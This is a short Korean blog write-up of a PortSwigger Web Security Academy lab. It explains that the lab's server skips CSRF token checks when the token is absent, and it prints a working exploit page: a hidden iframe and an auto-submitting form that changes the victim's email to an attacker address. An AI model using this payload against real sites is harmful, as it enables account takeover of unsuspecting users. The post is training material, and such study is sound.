https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present
Lab: CSRF where token validation depends on token being present | Web Security Academy
This lab's email change functionality is vulnerable to CSRF. To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to ...
portswigger.net
이전 문제와의 차이점은 GET으로 바꿔 요청 보내면 404가 뜬다는 점
Some applications correctly validate the token when it is present but skip the validation if the token is omitted.
csrf 토큰 유효성 검증을 하지만, csrf 토큰이 없을땐 그냥 skip해버린다는 점이 다르다
<html>
<body>
<iframe style="display: none" name="csrf-frame"></iframe>
<form method='POST' action="https://ac441f2f1---00d8.web-security-academy.net/my-account/change-email" target="csrf-frame" id="csrf-form">
<input type="hidden" name="email" value="attacker@attacker.net"/>
<input type="submit" value="submit">
</form>
<script>
document.getElementById("csrf-form").submit();
</script>
</body>
</html>'정보보안 > 웹해킹' 카테고리의 다른 글
| [PortSwigger] CSRF where token is tied to non-session cookie (0) | 2021.10.17 |
|---|---|
| [PortSwigger] CSRF where token is not tied to user session (0) | 2021.10.16 |
| [PostSwigger] CSRF where token validation depends on request method (0) | 2021.10.16 |
| [PortSwigger] CSRF vulnerability with no defenses (0) | 2021.10.16 |
| HTTP 메서드 OPTIONS, HEAD (0) | 2021.10.07 |
댓글